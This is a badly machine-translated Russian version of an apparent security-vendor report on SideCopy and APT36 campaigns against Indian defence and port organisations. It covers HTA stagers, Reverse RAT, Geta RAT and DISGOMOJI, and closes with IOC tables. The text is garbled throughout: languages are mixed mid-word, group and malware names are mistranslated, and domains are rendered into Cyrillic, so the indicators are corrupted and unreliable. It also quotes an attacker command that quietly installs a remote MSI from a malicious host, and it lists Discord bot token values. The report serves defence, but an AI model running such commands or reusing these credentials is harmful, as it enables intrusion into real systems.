An открытый каталог хостинг вредоносных программ связанный в Прозрачное Племя (APT36) был найден SEQRITE Команда APT из лабораторий. Fдальнейший анализ показало, в других материалах-носителях URL-адреса on тот же домен содержащие Полезная нагрузка используется его подразделение APT-группа Боковое копирование. Нацеленность на Индийские государственные структуры, такие как воздуха Сила, верфи и порты by SideCopy is наблюдается через мнесколько открытых каталогов которая кашельed свою новыйer Полезная нагрузка, сильная корреляция между se группы вместе с RusticWeb; включая домен/ IP, C2 имя, файл-приманкаs, и больше перекрывается были сожжены наблюдается. В этом блоге мы будет исследовать se Полезная нагрузка and Овехлопает видел в течение последний недавнее увеличение in такие кампании.
Ключевые результаты
APT перекрывается
- Обнаружено, что на одном домене одновременно размещаются полезные данные SideCopy и APT36, нацеленные на среды Windows и Linux соответственно.
- Сервер C2, используемый полезными нагрузками RAT SideCopy, имеет то же общее имя (WIN-P9NRMH5G6M8), которое обычно ассоциируется с APT36.
- Обе группы угроз вместе с RusticWeb, используют один и тот же файл-приманку в различных форматах, инфраструктуре и веб-сервисах в своих цепочках заражения, что укрепляет их связи.
Инфекции SideCopy
- Использует обновлённый HTA, аналогичный SideWinder, для обхода обнаружения, что делает его полностью необнаружимым (FUD). В стейджере SideCopy были обнаружены закодированные URL-адреса, на которых размещались RTF-файлы APT-группы SideWinder.
- Обратный RAT доставляется через пакеты MSI с использованием «ВВС Индии Также были обнаружены тема в качестве приманки и варианты Reverse RAT в оперативной памяти. На двух других доменах были обнаружены открытые каталоги, содержащие файлы DOTM для доставки Reverse RAT через BAT-файлы, нацеленные на верфи и порты.
- Также были замечены новые полезные нагрузки, используемые для кражи документов и изображений, такие как Cheex, USB-копир для кражи файлов с подключенных накопителей, приложение FileZilla и скрипты SigThief.
- Было выявлено тестирование обхода антивирусной защиты в Пакистане. В то же время, трафик жертв из Индии, который обычно наблюдается с C2, расположенного в Германии, маршрутизируется по протоколу IPsec с пакистанских IP-адресов, которые используются совместно. Брат-профессор от команды Cymru.
- Новая полезная нагрузка на базе .NET, называемая Geta RAT, выполняется в памяти HTA и включает в себя функционал захвата браузера из Async RAT. Параллельно с этим, Action RAT загружается извне. charmap.exe вместо credwiz.exe/reykeywiz.exe и использование темы «медовая ловушка», названной «Изображение WhatsApp» виден.
Прозрачные инфекции племени
- Загрузчик на основе Golang, предназначенный для систем Linux, используется для извлечения финальной полезной нагрузки из Google Диска. Недавно было замечено, что эта финальная полезная нагрузка загружается с домена и получила название ДИСГОМОДЖИ Volexity, где упоминались «слабые инфраструктурные связи с SideCopy».
- Группа продолжает нацеливаться на платформу Linux с Poseidon, используя ярлыки на рабочем столе с привлекательными темами, такими как "Pостинг/Перевод по Ф-III Rвращательный Transfer», "Черный список IP-адресов с TLP и датами" и ‘Контрольный список LTC.
- Использование Crimson RAT с «Результаты выборов в Уттаракханде» и «Краткое изложение заявления TDS» Также были замечены приманки со встроенным приложением FileZilla.

Рис. 1 – Перекрывающаяся цепочка заражения
Перекрывающаяся атака
Домен, найденный в открытом каталоге, — кампуспорталы[.]в с несколькими папками, размещёнными на нём. Они содержат полезные нагрузки Linux на Golang, приписываемые APT36, но в то же время было обнаружено несколько скрытых URL-адресов, на которых размещаются стейджеры HTA, принадлежащие SideCopy APT. Домен изначально служил руководством к различным вступительным экзаменам в Индии, последний пост о которых в их Twitter/YouTube был опубликован в 2016 году. Аналогичный открытый каталог был наблюдается ранее размещал SideCopy-стейджеры на том же программном обеспечении LiteSpeed Веб-сервер. В данном случае домен обзорзадания[.]в был использован для другого образовательного портала, посвященного услугам дошкольного образования и ухода.

Рис. 2 – Открытый каталог, где размещены APT36 и скрытые URL-адреса с стейджерами SideCopy
В одном из каталогов находится ZIP-архив, содержащий защищённый паролем PDF-файл и двоичный файл ELF, упакованный UPX. При распаковке открывается двоичный файл Golang, который выполняет функцию загрузчика и сначала открывает поддельный PDF-файл, используя пароль.745414'. Тема приманки — опрос об использовании интернета, который наблюдался в нескольких предыдущих кампаниях SideCopy с февраля 2023 года.

Рис. 3 – Приманка для интернет-опроса
Затем он загружает полезную нагрузку следующего этапа с Google Диска как gnucoreinfo в скрытый каталог .x86_32-linux-gnu, делает его исполняемым и запускает в фоновом режиме. Сохранение настраивается с помощью двух записей AutoStart на рабочем столе: GNOME_Core.desktop и GNULib_Update.desktop. Скрипт bash удален и зарегистрирован для крон задание по загрузке полезной нагрузки и убедитесь, что не запущен дублирующий процесс, как показано ниже.

Рис. 4 – Процесс загрузчика Golang в скрипте сохранения
Вариант DISGOMOJI
Последняя полезная нагрузка — это еще один упакованный UPX двоичный файл ELF на базе Golang, называемый «vmcoreinfo.txt'. Это троян удалённого доступа, основанный на репозитории с открытым исходным кодом. дискорд-c2, который использует сервер Discord в качестве C2 и эмодзи для общения. Volexity наблюдал различные варианты DISGOMOJI, где идентификатор сервера и токен бота сервера Discord либо жестко запрограммированы, либо загружаются во время выполнения, как BID1.txt и GID1.txt от ordai[.]questВ этой версии для их загрузки используется Google Drive со следующими именами, что указывает на то, что это второй сервер:
| Имя файла | Подробности и ссылки для скачивания на Google Диске |
| BID2.txt | MTI0NjkwMDE2NTI1MjQ4NTM1Mg.GWqtv3.cZmv1ZIts2ClyZ6jcKKpRzkD_hChmEkfDcZKeM (Server ID) |
| hxxps://drive.google.com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe | |
| GID2.txt | 1246900038160879688 (токен бота) |
| hxxps://drive.google.com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t | |
| GTK-Theme-Parse.txt | 2bf596603c432fa46b494dc3edd2d30f (MD5) |
| hxxps://drive.google.com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_ |
Все представленные сообщения об ошибках пытаются увести от фактической функциональности, но замечено одно интересное имя ошибки: «Ошибка обновления Репозиторий Кавача: %v«. Запутанный файл с именем GTK-Theme-Parse.txt Загружается программа, которая периодически копирует файлы с подключенных USB-накопителей в локальный каталог. Аналогичным образом настраивается cron-задание для сохранения, и эти файлы можно извлечь с помощью RAT на основе эмодзи.

Рис. 5 – Замаскированный скрипт похитителя USB-носителей
DISGOMOJI изначально собирает основные сведения о системе, а его функциональность включает в себя создание снимков экрана, выполнение команд, загрузку файлов на веб-сервисы (оши[.]ат и перевод[.]ш), скачивать и загружать файлы через сервер Discord, получать профили браузера Firefox и находить файлы по расширению для извлечения. В последнем есть уникальная строка на пенджаби (самом популярном языке в Пакистане), которая переводится как «Я дал тебе все знания, чего ещё ты хочешь?», что подходит для извлечения данных. Новые версии для Windows и Linux PYSHELLFOX и GLOBESHELL за кражу файлов и профилей Firefox также упоминалась компания BlackBerry.

Рис. 6 – Сообщение об эксфильтрации
Вариант Посейдона
Мы также наблюдали постоянное развертывание агентов Poseidon через ярлыки рабочего стола Linux компанией Transparent Tribe, где файлы-приманки размещались аналогичным образом на Google Drive, имея фикуматры gmail.com и fitfalcon0900 gmail.com как владелец аккаунта. три различный манки наблюдается все они связаны с различными документами правительства Индии. Эти остинг/перевод офицеров при Министерстве Обороны с предыдущего года, занесенные в черный список IP-адреса с ТЛП и даты и чекk список для претензий LTC.

Рис. 7 – Ложный черный список IP-адресов с Poseidon (1)

Рис. 8 – Контрольная ловушка с «Посейдоном» (2)

Рис. 9 – Размещение/передача приманка с Посейдоном (3)
Боковое копирование
На основе URL-адресов, обнаруженных при недавнем заражении SideCopy, были выявлены похожие хостинги HTA-стейджеров и те же приманки. Заражение начинается с архивного файла-ярлыка, который запускает процесс MSHTA для выполнения удалённых HTA-файлов, размещённых на том же домене. Всего было обнаружено шесть HTA-файлов с именами 1.hta or 2.hta. Первый вариант HTA включает две функции декодирования base64: одна основана на JavaScript, а другая использует объекты ActiveX. Функциональность остаётся прежней: проверка версии .NET, установка антивирусной защиты, объединение полезной нагрузки и декодирование строк, а также выполнение DLL-библиотеки в памяти с передачей файла-обманки.

Рис. 10 – HTA stager 2nd вариант
Второй вариант HTA сильно запутан и наблюдается лишь время от времени с прошлого года, для чего используются несколько методов:
- Декодируйте строку, закодированную в формате base64, используя собственный алфавит.
- Расшифровка на основе XOR (с ключами: f551e832 и bWqQ)
- Перестановка строк на каждые 1/2/5 символов
- Сдвиг шифра Цезаря с использованием нескольких ключей

Рис. 11 – Деобфускация в HTA
Общая функциональность осталась прежней, но эти шаблоны обфускации были замечены в HTA SideWinder APT с прошлого года. Строки, которые не используются нигде в скрипте, содержат URL-адреса (кабинет-gov-pk[.]ministry-pk[.]net), на котором несколько лет назад размещались RTF-файлы SideWinder.

Рис. 12 – SideCopy stager с URL-адресами SideWinder (комментарии из анализа)
В памяти preBotHta DLL выполняет обычную последовательность действий: открывает обманку и устанавливает антивирусное решение. В зависимости от антивирусного решения, он устанавливает сохранение в виде комбинации запланированной задачи (VBScript), ключа реестра или ярлыка запуска. В конечном итоге он либо устанавливает два дополнительных файла HTA, либо загружает MSFTEDIT.dll (Action RAT) изhxxps://campusportals.in//files//documents//backup//ap.txt' который загружен сбоку charmap.exe который подключается к 64.188.27[.]144 на порту 5863 для C2.

Рис. 13 – Домен SideWinder, на котором размещены файлы RTF
Удалённые HTA-файлы называются useH, useT и alphaT и обладают той же функциональностью HTA, что и упомянутая выше, и в конце запускают DLL-библиотеку в памяти. Обнаружены две разные DLL-библиотеки: одна — Reverse RAT, включающая 19 команд для C2 и USB-захватчик файлов для сохранения файлов и папок при подключении нового диска. Вторая — новый Geta RAT на базе .NET с 30 командами для C2, который также может похищать данные всех учётных записей, профилей и файлов cookie браузеров Firefox и Chromium. Этот плагин для браузера заимствован из Async RAT, как показано ниже.

Рис. 14 – Geta RAT против Async RAT
| Нет | Command | Функциональность системы |
| 1 | Отключенные | Закрыть соединение |
| 2 | Системная информация | Получить системные данные (имя компьютера, имя пользователя, размер экрана, доступная и общая память (физическая и виртуальная), сведения об ОС, состояние заряда батареи, время работы системы, драйверы, сведения о сети) |
| 3 | убийство | Убить определенный процесс и получить список процессов |
| 4 | Менеджер процессов | Получить список процессов |
| 5 | ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ | Получить установленное программное обеспечение |
| 6 | пароли | Получите учетные данные Firefox и браузера на базе Chromium из всех учетных записей/профилей/файлов cookie |
| 7 | RD | Получить снимок экрана удаленного рабочего стола |
| 8 | GetPcBounds | Получить размер экрана |
| 9 | SetCurPos | Установить положение курсора |
| 10 | GetHostsFile | Получить файл \etc\hosts |
| 11 | SaveHostsFile | Сохранить файл \etc\hosts в указанном месте |
| 12 | GetCPText | Получить содержимое буфера обмена |
| 13 | СохранитьCPText | Сохранить содержимое буфера обмена в указанном месте |
| 14 | Оболочка | Выполнить команду через «cmd /C» |
| 15 | Начало записи | Функциональность не определена, но, скорее всего, используется для захвата экрана. |
| 16 | Остановка записи | Функциональность не определена, но, скорее всего, используется для захвата экрана. |
| 17 | ЗаписьСкачать | Функциональность не определена, но, скорее всего, используется для захвата экрана. |
| 18 | ListDrives | Получить список дисков |
| 19 | СписокФайлов | Получить файлы и каталоги по указанному пути |
| 20 | MkDir | Создать новый каталог |
| 21 | RmDir | Удалить каталог |
| 22 | rnfolder | Переименовать каталог |
| 23 | mvdir | Переместить каталог |
| 24 | rmfile | Удалить файл |
| 25 | rnfile | Переименовать файл |
| 26 | общий файл | Скачать файл |
| 27 | пробег | Запустить файл |
| 28 | Выполнить | 1. Загрузите файл и запустите его с помощью DLL Side-loading. 2. Выполните «cmd /C netstat -ano» и получите статус подключения IP-адреса сервера. 3. Установите AV |
| 29 | addSys | Установить сохранение через реестр или автозагрузку |
| 30 | файл загружен | Загрузить файл |
Были замечены две похожие версии HTA, напоминающие CACTUS TORCH и SILENT TRINITY, но они полностью избежали обнаружения. Они запускаются через файлы-ярлыки и используют такие темы, как «медовая ловушка» и противостояние США и Китая, чтобы в конечном итоге сбросить последнюю полезную нагрузку.

Рис. 15 – Новый этап HTA
В этом новом HTA отмечены следующие отличия, хотя функциональность осталась прежней:
- Помимо декодирования base64, используется ещё одна функция с заданной длиной для декодирования данных. В первую очередь, встроенная DLL кодируется дважды с помощью этих функций.
- Обманный файл и загружаемая сбоку библиотека DLL не встраиваются отдельно в HTA, а в саму .NET DLL.
- Не использует запросы WMI для установки AV и VBScript для получения версии .NET.
- Важно отметить, что не указана цель для создания экземпляра и динамического вызова.

Рис. 16 – Упрощенная версия HTA
Вместо загрузки preBotHta or SummitOfBion в памяти, BroaderAspect.dll Видно, как он устанавливает приманку и открывает её. Проверка антивирусом не производится, но ключ запуска реестра настроен на сохранение, и DLL (DUser.dll) загружается через rekeywiz. Целевой каталог — «C:\Users\Public\BroadCastUSB\crezly.exe», а путь PDB, связанный с двумя файлами, — «E:\TestAssembly\obj\Debug\BroaderAspect.pdb».

Рис. 17 – DLL, работающая в памяти MSHTA
Обратные RAT-кампании
Были отмечены многочисленные случаи заражения, приводящие к обратному RAT, с использованием приманок и поддельных доменов, связанных с различными судостроительными доками, портами и даже Военно-воздушными силами. Все эти организации находятся в ведении Министерства обороны (МО) и Министерства портов, судоходства и водных путей (MOPSW) Индии.

Рис. 18 – Обратная инфекция RAT и цели
Отдельный вариант Reverse RAT был выпущен в виде MSI-пакета в то же время. ZIP-файл с именем «Повышение_зарплаты_за_2024_финансовый_год' содержит ярлык LNK для загрузки и запуска пакета MSI как:
- C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /i hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/
Пакет состоит из PE-файла .NET Confuser, который запускается во время выполнения пользовательских действий и установки, как показано на рисунке ниже. Обратный RAT удаляется как «C:\\ProgramData\\VSUpdates\\svirbre.exe» в конце с теми же 19 командами для C2 и сохранение для него устанавливается через другой скрипт HTA fileros.hta с помощью ключа реестра run.
| Нет | Command | Функциональность системы |
| 1 | пробег | Запустить файл |
| 2 | список | Список файлов или каталогов по пути |
| 3 | убийство | Убить запущенного процесса |
| 4 | Закрыть | Закройте соединение с C2 |
| 5 | переименовать | Переименовать файл |
| 6 | экран | Сделайте снимок экрана |
| 7 | загружать | Загрузить файл в C2 |
| 8 | удалять | Удалить файл |
| 9 | зарегистрировать | Перечислите все ключи реестра и их значения. |
| 10 | процесс | Список всех запущенных процессов |
| 11 | программы | Список всех установленных программ |
| 12 | скачать | Загрузить файл из C2 |
| 13 | creatdir | Создать новый каталог |
| 14 | shellexec | Выполнить команду или открыть файл с помощью cmd.exe |
| 15 | regnewkey | Создайте новый раздел реестра |
| 16 | буфер обмена | Извлечь содержимое буфера обмена |
| 17 | regdelkey | Удалить раздел реестра |
| 18 | downloadexe | Скачать и выполнить файл |
| 19 | набор буфера обмена | Установить содержимое буфера обмена |

Рис. 19 – Пакет MSI для отказа от Reverse RAT
Цепочка заражения полезными нагрузками выглядит следующим образом:
| Имя файла | Описание |
| Salary_Increment_FY_2024.zip | Дата изменения: 2024 |
| Salary_Increment_FY_2024.pdf.lnk | Идентификатор машины: cop125n, Дата изменения: 2023 |
| newpictures.png (MSI) | Дата изменения: 2020, Автор: MSTech Soft |
| Filmeos.exe | .NET Confuser 1.x |
| svirbre.exe (обратный RAT) | Ключ: winupdates@7 C2: defender.windowupdatecache[.]in/officalupdates |
В сброшенном документе содержится информация о повышении заработной платы военнослужащим ВВС Индии. Это недавний документ, в котором указана дата начала выплат — июль 2024 года.

Рис. 20 – Платежная приманка индийских ВВС
Больше открытых каталогов
В июле были обнаружены ещё два домена с открытыми каталогами, на которых размещались как новые, так и старые вредоносные данные SideCopy, судя по временным меткам. Они содержат множество EXE-, PNG-, PDF-, BAT- и других документов, используемых в кампаниях Reverse RAT. Домен slidesfinder[.]com размещенные образцы июля, которые извлекают полезные данные из другого домена mazagondoc[.]com, который, в свою очередь, размещал файлы в октябре 2023 года для атак с внедрением шаблонов.

Рис. 21 – Открытые каталоги, в которых размещены полезные данные SideCopy
Два шаблона документов с поддержкой макросов, названные Aerospace.dotm и tmps.dotm Было замечено, что начинается цепочка заражения. При открытии документа запускаются обфусцированные подпрограммы, которые загружают размещенный PNG-файл как пакетный скрипт.08973422348.bat» в каталог TEMP, если ответ HTTP — 200. Если файл существует, он запускает пакетный файл с помощью функции Shell.

Рис. 22 – Макрос VBA в шаблонах документов
В одном из шаблонов он позже вызывает подпрограмму UNLK, которая изменяет прикрепленный шаблон активного документа на Normal.dotm Шаблон в каталоге пользователя, а затем закрывает документ без сохранения изменений. В случае ошибки вызывается подпрограмма DVBP, которая пытается удалить все компоненты VBA из документа, тем самым удаляя весь код VBA. Пакетный скрипт, показанный ниже, по сути, загружает полезную нагрузку Reverse RAT в формате PNG, используя PowerShell, копирует его в скрытый каталог и создает запланированную задачу для запуска каждые 5 минут.

Рис. 23 – Пакетный скрипт для загрузки обратного RAT
Файл-приманка Письмо002.pdf Также одновременно загружается и открывается информация о контрактах компании Cochin Shipyard Limited, действующей в рамках Министерства портов, судоходства и водных путей, за январь 2024 года. Доступна вся ежемесячная информация о контрактах. публично на их законном домене. Помимо прослушивания 19 команд, Reverse RAT загружает ещё один файл с mazagondoc[.]com домен, имитирующий официальное название Mazagon Dock Shipbuilders Limited Министерства обороны – mazagondock[.]в Этот домен, содержащий полезные данные, также был замечен в кампании октября 2023 года, распространявшей Revere RAT с аналогичными целями. C2, обнаруженный в Reverse RAT, vocport[.]com/Contactus, который имитирует сферу деятельности Управления порта VO Chidambaranar при Министерстве портов, судоходства и водных путей.

Рис. 24 – Ложная цель с подробностями контракта с верфью Кочин
Все больше и больше .NET
Загружается и запускается новая полезная нагрузка на базе .NET, которая позволяет искать и сохранять файлы с определённым расширением. Они затем распространяются на следующие серверы, как показано в двух образцах:
- hxxp://149.28.95.195/dakshf_upload.php
- hxxps://googleservices[.]live/dakshf_upload.php
Эти образцы также содержат путь PDB исходного проекта под именем пользователя ««Мертвая змея» с именем cheex (существует не связанная онлайн-платформа с таким именем). Он проверяет пять папок – «Рабочий стол», «Личные», «Общие документы», «Загрузки» и «Недавние» – на наличие файлов с 12 расширениями: DOCX, DOC, XLSX, XLS, PPTX, PPT, PDF, BAK, JPEG, JPG, PNG и TXT.
| C:\Users\Dead Snake\source\repos\cheex-folderwise\cheex\obj\Release\dlhost.pdb |
| C:\Users\Dead Snake\source\repos\cheex\cheex\obj\Debug\cheex.pdb |

Рис. 25 – Новые полезные нагрузки для извлечения файлов
Как видно из вышеприведенного примера Reverse RAT, поставляемого через MSI-файл, который включал функцию извлечения файлов с подключенных USB-устройств, теперь эта функция представлена в виде отдельного модуля. Все буквы дисков перечисляются, и файлы копируются в каталог TEMP с помощью фоновых рабочих процессов перед загрузкой на тот же IP-адрес. Пути PDB, наблюдаемые для двух образцов, следующие:
| e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Release\AdobeReaders.pdb |
| e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Debug\AdobeReaders.pdb |
Другие обнаруженные файлы — это документы с поддержкой макросов, приманки, приложение FileZilla (используемое для передачи файлов) и скрипт Python с открытым исходным кодом. SigThief использовались для кражи и добавления подписей, размещались в связи с предыдущими кампаниями.
- Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_29092023.docx
- Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_131023.docx
- Отчет_по_разделу_проекта_и_услуг_10102023.docx
- Письмо002.pdf
- NavalProjects.pdf
На том же домене были обнаружены и другие документы-приманки, используемые в кампаниях 2023 года. Они связаны с разрешениями на вход в порт для государственного управления порта Чидамбаранар и статусом счетов-фактур поставщиков, связанных с военно-морскими проектами. Эти приманки публично имеющиеся документы.

Рис. 26 – Приманка в виде морского порта из кампании октября 2023 г.

Рис. 27 – Приманка на тему счета-фактуры военно-морского проекта из кампании октября 2023 г.
Инфраструктура и атрибуция
На основании проведенного нами анализа мы обнаружили совпадения между тремя APT-группами, связанными с Пакистаном. Известно, что группа Transparent Tribe использует разнообразный набор техник и языков, таких как Golang, Python и т. д., а Operation RusticWeb использует полезную нагрузку на основе Rust. Обе группы используют оши[.]ат веб-сервис, два одинаковых документа-приманки PDF и их поддельные домены были преобразованы в один и тот же IP-адрес, как это наблюдали BlackBerry и Volexity.

Рис. 28 – Пакистанские APT-перекрытия
Аналогичным образом, наблюдались совпадения между SideCopy и APT36, такие как приманки, Linux-stager для сброса Ares RAT и Poseidon соответственно, полезные нагрузки на основе АллаКоре РАТ и общее название для C2. Мы считаем, что RusticWeb напрямую связан с APT36 со средней или высокой степенью уверенности, подобно SideCopy, действующей как подгруппа APT36.
Поддельные/скомпрометированные домены, используемые для размещения полезных нагрузок, преобразуются в следующие IP-адреса, два из которых имеют общее имя WIN-BEJO0EMFO5K.
| Домен | IP | ASN |
| кампуспорталы[.]в | 192.64.117[.]203 | AS22612 – Namecheap |
| mazagondoc[.]com | 172.67.217[.]17 CN=WIN-BEJO0EMFO5K |
AS13335 – Cloudflare |
| slidesfinder[.]com | 103.133.215[.]65 CN=WIN-BEJO0EMFO5K |
AS133643 – Ewebguru, Индия |
| дипл[.]сайт | 151.106.117[.]91 | AS47583 – Хостингер |
| уткалсевасамитиканжурмарг[.]в | 162.0.209[.]114 | AS22612 – NameCheap |
Если посмотреть на серверы C2, IP-адрес 64.188.27[.]144 использовался с Action RAT и Geta RAT на тех же портах, но даже Reverse RAT C2 checkdailytips.servehttp[.]com Разрешённый этому IP-адресу. Общее имя, связанное с ним, WIN-P9NRMH5G6M8 встречается на большинстве C2-серверов APT36.

Рис. 29 – IP с общим названием APT36
Домен vocport[.]com используется в настоящее время, а также в прошлых кампаниях с октября 2023 года. Данные WHOIS всех серверов C2 с наблюдаемыми полезными нагрузками приведены ниже:
| IP | ASN | полезная нагрузка |
| vocport[.]com 104.21.40[.]190 172.67.156[.]79 |
AS13335 – Cloudflare | Обратная RAT |
| defender.windowupdatecache[.]в 172.67.128[.]127 |
AS13335 – Cloudflare | Обратная RAT |
| checkdailytips.servehttp[.]com dns1.indianblog[.]xyz 64.188.27[.]144 |
AS8100 – QuadraNet
CN=WIN-P9NRMH5G6M8 |
Обратная Крыса, Крыса Действия, Крыса Гета |
| googleservices[.]live 149.28.95[.]195 |
AS13335 – Cloudflare AS20473 – Чупа |
Cheex, USB-копир |
| 84.247.170[.]237 | AS51167 – Контабо | Новая КРЫСА |
| 165.22.221[.]71 178.128.166[.]148 152.42.162[.]105 161.35.207[.]209 159.65.146[.]80 157.245.100[.]177 |
AS 14061 – DigitalOcean | Посейдон |
На основании этой корреляции и предыдущих цепочек атак эти кампании с высокой степенью уверенности приписываются обеим группам APT36 и SideCopy, что устанавливает еще одну прочную связь между ними.
Заключение
Обнаружено несколько открытых каталогов, содержащих стейджеры/полезную нагрузку, связанную с пакистанскими APT-группами, нацеленными на ВВС Индии, порты и верфи государственных структур. Были отмечены различные кибероперации, в которых обнаружено пересечение атак Transparent Tribe, SideCopy и RusticWeb.
APT36 фокусируется преимущественно на системах Linux, тогда как SideCopy нацелена на системы Windows, добавляя новые полезные нагрузки в свой арсенал. Во втором квартале 2024 года было зарегистрировано несколько связанных с Пакистаном группировок, нацеленных на Индию и использующих вредоносное ПО для Android. Среди них — Operation Celestial Force, отслеживаемая как… Космический Леопард и еще один новый группы использование WhatsApp для доставки SpyNote RAT. Рекомендуется принять необходимые меры предосторожности и оставаться в безопасности на фоне непрекращающихся кибератак на Индию.
SEQRITE Protection
- Lnk.Sidecopy.48846.Gen_GC
- MSI.Sidecopy.48847.GC
- JS.Sidecopy.48848.Gen_GC
- Docx.APT36.48849.GC
- ELF.Agent.48863.GC
- ELF.Agent.48860.GC
- O97M.Dropper.DZ
- BAT.Downloader.48924
- XML.SideCopy.48922
- XML.SideCopy.48923
- TrojanAPT.ReverseRAT.S33893087
МНК
Боковое копирование
| HTA | |
| ced11422832a7380381323ae78a7a9bc f270105309e6574cab7a6acb1efb3c20 c574b2ebcc0aff84a23f1215f8a803be |
1.hta |
| 4938f42a3d691ef78f1ee8edc3b38f87 817532c454637a302238a4751694c336 e2f8fbc105a84283e191362f4ca07ae4 |
2.hta |
| 7c3b49f642f19116878b2c190f344f63 | альфаТ.хта |
| f6a58b0d267c7c53ccbcc6dafafd499b f55afc8192f30ff7a584dbda700383d1 |
useH.hta |
| d6ae362b4b3f7a67949d177fdfc6bdec | useT.hta |
| 907ba4486c589f2cb4a45b92f2a5350e | Imge12542.hta |
| 336316c1b5ed77d31b4adc06e06a2f84 | ugt254d.hta |
| LNK | |
| f60c1a04161f354f0c6ac4678b3062d0 | Salary_Increment_FY_2024.pdf.lnk |
| 4dfdacf33db6ae0341b4d0e65aa3d755 | WhatsApp_Image_2024-05-06.lnk |
| 2041d2347f78ce03c1f9e990724adf3c | Противостояние_США_Китай_Возможность_для_Индии-Чадха-21-Авг-23.lnk |
| ZIP | |
| fe8bf0bf2697d5e43e38d4b0364485a6 | Salary_Increment_FY_2024.zip |
| b99717d81e142e58af91efb4d5288bda | WhatsApp_Image_2024-05-06.zip |
| 109897ba1f92339f9dc9a74dc38dfc88 | US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip |
| Малдок | |
| 807e6c1094b760e748a84ef9e05bc1f8 | Aerospace.dotm |
| abb863131bbffad1dd8ee72d0758f34b | tmps.dotm |
| eebb4913b54af93bcfc7d56e081502af | Отчет_по_разделу_проекта_и_услуг_10102023.docx |
| e73b0354790273b0fcaa8c2deab3ad87 | Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_131023.docx |
| 44b23edd6c9a63a2a38f1bf3d4ff5bb9 | Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_29092023.docx |
| 354716db015373c089744e7319cd93d3 | Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_29092023.docx |
| Другое | |
| 6b45d5f194e2799e5178c8d858673900 | 08978.png (летучая мышь) |
| 56fd3a2f701d30fe3e5ebdd0d471f1ed | newpictures.png (MSI) |
| EXE | |
| 2478a5f6b82461eb06f3099478c4e2f6 | DUser.dll |
| 97113b266fbff61d8d2f92793672688d | Filmeos.exe |
| 96764912417d260653b6949afb0ad25c | Chromes.exe |
| 6a0adcf34a2f0ac21089b994dff02b85 | Файлзилла.exe |
| Обратная RAT | |
| a7a71259bdf700807a763119fd652e73 | svirbre.exe / Fantos.exe |
| c006701ec5025222a74a419f8c238689 | Postgrex.exe / rtloki.png |
| d5719a9ef7a6f012e26d0c86b4a676d9 | igfxm.exe / rt12.png |
| e6404136626a446b46bf4ecaa885560e | igfxtk.exe |
| Cheex | |
| 825c7a1603f800ff247c8f3e9a1420af | AdobeArm.exe / dlhost.exe |
| 253957d7df5c7e70ec9001766e8f087b | cheex.exe |
| USB-копир | |
| 3d2001c112290c019afcd51fede564d3 | AdobeReaders.exe / msedg.exe |
| 7ca8532b081f8612d1c0b6ea01d40299 | AdobeReaders.exe / msedgprefix.exe |
| Приманки | |
| 5e88b5122ae380c4b4741dcf0bdca198 | Salary_Increment_FY_2024.pdf |
| e415374f1f9533f10f706f0a9124b0d4 | Изображение WhatsApp 2024 в 05:06:12.23.08 AM.jpeg |
| e79ca3852ae5e14766544ec1d5d4d268 | Противостояние США и Китая – возможность для Индии, Чадха, 21 августа 23 г., pdf |
| cc0b292144ccdf4a95014809258982c4 | Письмо002.pdf |
| 584ce9670a6f6a16eaaa615d64788f68 | NavalProjects.pdf |
| b2e007c6bde2d2ce03a5257732df95b2 | 001doc.pdf |
| d254f6d56ad874c5095b92d620cb5b80 | IT-тренды.docx |
| 5fc559e4b663c20c9d5ea46fd164f4c7 | Опрос.docx |
| f997a21e9f7ad5eb9242b4decb7fdeb9 | Индия — развивающаяся глобальная экономика.docx |
| Домены (поддельные/скомпрометированные) | |
| уткалсевасамитиканжурмарг[.]в | 162.0.209[.]114 |
| дипл[.]сайт | 151.106.117[.]91 |
| кампуспорталы[.]в | 192.64.117[.]203 |
| mazagondoc[.]com | |
| slidesfinder[.]com | |
| C2 и порты | |
| checkdailytips.servehttp[.]com/dailyworkout | |
| защитник[.]windowupdatecache[.]в/ 172.67.128[.]127:80 |
|
| 84.247.170[.]237:4858 | |
| 64.188.27[.]144:5863 | |
| hxxp://vocport[.]com/Contactus | |
| hxxp://vocport[.]com/khalistanLeaderprotest | |
| hxxp://149.28.95[.]195/dakshf_upload.php | |
| hxxps://googleservices[.]live/dakshf_upload.php | |
| URL-адреса | |
| hxxps://campusportals[.]in/files/documents/bs/economy/ | |
| hxxps://campusportals[.]in/files/documents/bs/economy/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/economy/2.hta | |
| hxxps://campusportals[.]in/files/documents/bs/it/ | |
| hxxps://campusportals[.]in/files/documents/bs/it/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/it/2.hta | |
| hxxps://campusportals[.]in/files/documents/bs/survey/ | |
| hxxps://campusportals[.]in/files/documents/bs/survey/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/survey/2.hta | |
| hxxps://campusportals[.]in/files/2.hta | |
| hxxps://campusportals[.]in/files/documents/bs/2.hta | |
| hxxps://campusportals[.]in/files/documents/xmlnsprcs.hta | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/ | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/newpictures.png | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/Salary_Increment_FY_2024.zip | |
| hxxps://dipl[.]site/Content/2022-23/01/03/ | |
| hxxps://dipl[.]site/Content/2022-23/01/03/Imge12542.hta | |
| hxxps://dipl[.]site/Content/2022-23/01/04/WhatsApp_Image_2024-05-06.zip | |
